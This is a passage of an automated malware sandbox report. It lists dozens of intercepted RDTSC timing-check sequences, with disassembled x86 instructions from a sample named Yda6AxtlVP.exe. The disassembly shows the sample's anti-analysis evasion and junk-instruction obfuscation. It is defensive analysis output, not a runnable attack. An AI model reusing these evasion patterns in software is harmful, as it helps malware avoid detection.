popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1634D15 second address: 1634D25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1634E03 second address: 1634E09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1635739 second address: 163573F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1635869 second address: 1635873 instructions: 0x00000000 rdtsc 0x00000002 js 00007F9665989DACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1635AD2 second address: 1635AD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 163910B second address: 1639111 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 15ED19C second address: 15ED1A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 15ED1A0 second address: 15ED1B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F9665989DA6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 15ED1B0 second address: 15ED1B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 15ED1B4 second address: 15ED1BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16396F0 second address: 16396FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16396FE second address: 163970E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 163A806 second address: 163A86A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jp 00007F96652499F6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007F96652499F8h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 00000014h 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 push 00000000h 0x00000029 jmp 00007F96652499FCh 0x0000002e push 00000000h 0x00000030 call 00007F96652499FEh 0x00000035 pop edi 0x00000036 xchg eax, ebx 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F9665249A09h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 163A86A second address: 163A88B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b js 00007F9665989DACh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 163B374 second address: 163B3EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96652499FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a mov dword ptr [esp], eax 0x0000000d push eax 0x0000000e mov si, di 0x00000011 pop edi 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007F96652499F8h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 00000016h 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ecx 0x00000033 call 00007F96652499F8h 0x00000038 pop ecx 0x00000039 mov dword ptr [esp+04h], ecx 0x0000003d add dword ptr [esp+04h], 00000014h 0x00000045 inc ecx 0x00000046 push ecx 0x00000047 ret 0x00000048 pop ecx 0x00000049 ret 0x0000004a mov edi, dword ptr [ebp+12A03893h] 0x00000050 xchg eax, ebx 0x00000051 jmp 00007F96652499FDh 0x00000056 push eax 0x00000057 jo 00007F9665249A00h 0x0000005d pushad 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 163B0E1 second address: 163B0E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 163C946 second address: 163C94A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 163C6A1 second address: 163C6A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 163C6A5 second address: 163C6A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 163C6A9 second address: 163C6AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 163E02F second address: 163E042 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007F96652499F8h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 163FBFC second address: 163FC0B instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9665989DAAh 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 163FC0B second address: 163FC36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F9665249A06h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007F96652499FEh 0x00000016 push edx 0x00000017 pop edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 163FC36 second address: 163FC44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jc 00007F9665989DA6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 163FC44 second address: 163FC4C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 163FC4C second address: 163FC5C instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9665989DB2h 0x00000008 jo 00007F9665989DA6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 15F2172 second address: 15F2176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 15F2176 second address: 15F217C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 15F217C second address: 15F2180 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16445C4 second address: 16445CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F9665989DA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1643810 second address: 1643814 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1644791 second address: 16447AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F9665989DACh 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16466F4 second address: 1646704 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007F96652499F6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1644883 second address: 1644887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1646704 second address: 1646708 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1644887 second address: 164488B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1646708 second address: 164670E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16477BE second address: 16477C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16477C2 second address: 16477DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jnp 00007F96652499FCh 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1648767 second address: 164876B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1647A37 second address: 1647A54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9665249A09h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 164876B second address: 1648786 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DB4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1647A54 second address: 1647A7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b jc 00007F96652499F6h 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F9665249A06h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 164A765 second address: 164A77C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DB1h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 164890D second address: 1648913 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 164A77C second address: 164A780 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1648913 second address: 1648921 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1648921 second address: 1648925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 164ACB8 second address: 164ACBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1648925 second address: 1648929 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 164ACBC second address: 164ACE0 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F96652499F8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9665249A04h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 164ACE0 second address: 164AD45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F9665989DB5h 0x0000000c jne 00007F9665989DA6h 0x00000012 popad 0x00000013 popad 0x00000014 nop 0x00000015 mov edi, dword ptr [ebp+12A03673h] 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push ebx 0x00000020 call 00007F9665989DA8h 0x00000025 pop ebx 0x00000026 mov dword ptr [esp+04h], ebx 0x0000002a add dword ptr [esp+04h], 00000018h 0x00000032 inc ebx 0x00000033 push ebx 0x00000034 ret 0x00000035 pop ebx 0x00000036 ret 0x00000037 mov dword ptr [ebp+12A0B279h], edx 0x0000003d push 00000000h 0x0000003f mov di, cx 0x00000042 xchg eax, esi 0x00000043 pushad 0x00000044 push ecx 0x00000045 js 00007F9665989DA6h 0x0000004b pop ecx 0x0000004c pushad 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 164AD45 second address: 164AD4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 164AFC3 second address: 164AFC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 164CE07 second address: 164CE0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 164CE0B second address: 164CE0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 164CE0F second address: 164CE15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 164CE15 second address: 164CE1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F9665989DA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 164CE1F second address: 164CE23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1650D69 second address: 1650D85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 pop eax 0x00000007 pop esi 0x00000008 popad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9665989DB0h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 164C037 second address: 164C03D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 164EFEB second address: 164EFF1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 164EFF1 second address: 164F006 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96652499FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 164F006 second address: 164F014 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F9665989DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 164FF2F second address: 164FF44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jns 00007F96652499F8h 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 164F014 second address: 164F018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 164F0EC second address: 164F0F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1651E35 second address: 1651EB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F9665989DA8h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 adc di, E845h 0x0000002b push 00000000h 0x0000002d movzx edi, bx 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push edi 0x00000035 call 00007F9665989DA8h 0x0000003a pop edi 0x0000003b mov dword ptr [esp+04h], edi 0x0000003f add dword ptr [esp+04h], 0000001Ah 0x00000047 inc edi 0x00000048 push edi 0x00000049 ret 0x0000004a pop edi 0x0000004b ret 0x0000004c jno 00007F9665989DACh 0x00000052 mov edi, dword ptr [ebp+12A0387Bh] 0x00000058 push eax 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c push edx 0x0000005d pop edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1650FE4 second address: 1650FE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1650FE9 second address: 1651003 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F9665989DACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007F9665989DA6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1652001 second address: 1652022 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F9665249A06h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1652022 second address: 1652028 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1652028 second address: 16520B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 xor di, F300h 0x0000000e push dword ptr fs:[00000000h] 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007F96652499F8h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 00000015h 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f adc ebx, 3410DD42h 0x00000035 mov dword ptr [ebp+12B92569h], edx 0x0000003b mov dword ptr fs:[00000000h], esp 0x00000042 jl 00007F9665249A12h 0x00000048 call 00007F9665249A05h 0x0000004d mov ebx, dword ptr [ebp+12A026EEh] 0x00000053 pop ebx 0x00000054 mov eax, dword ptr [ebp+12A01311h] 0x0000005a mov edi, ecx 0x0000005c push FFFFFFFFh 0x0000005e jmp 00007F96652499FFh 0x00000063 nop 0x00000064 push eax 0x00000065 push edx 0x00000066 jne 00007F96652499FCh 0x0000006c rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 165308A second address: 16530A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DB4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16530A9 second address: 16530AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 165835F second address: 1658383 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edx 0x00000006 js 00007F9665989DB8h 0x0000000c jmp 00007F9665989DB0h 0x00000011 pushad 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push ecx 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 165EC5A second address: 165EC84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F9665249A08h 0x0000000b jp 00007F96652499F6h 0x00000011 popad 0x00000012 push eax 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1663F3C second address: 1663F41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1663F41 second address: 1663F48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1663F48 second address: 1663F55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1663F55 second address: 1663F5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1663F5A second address: 1663F82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e jnl 00007F9665989DA8h 0x00000014 pushad 0x00000015 ja 00007F9665989DA6h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1663F82 second address: 1663F8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1663F8F second address: 1663F93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1663F93 second address: 1663F9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
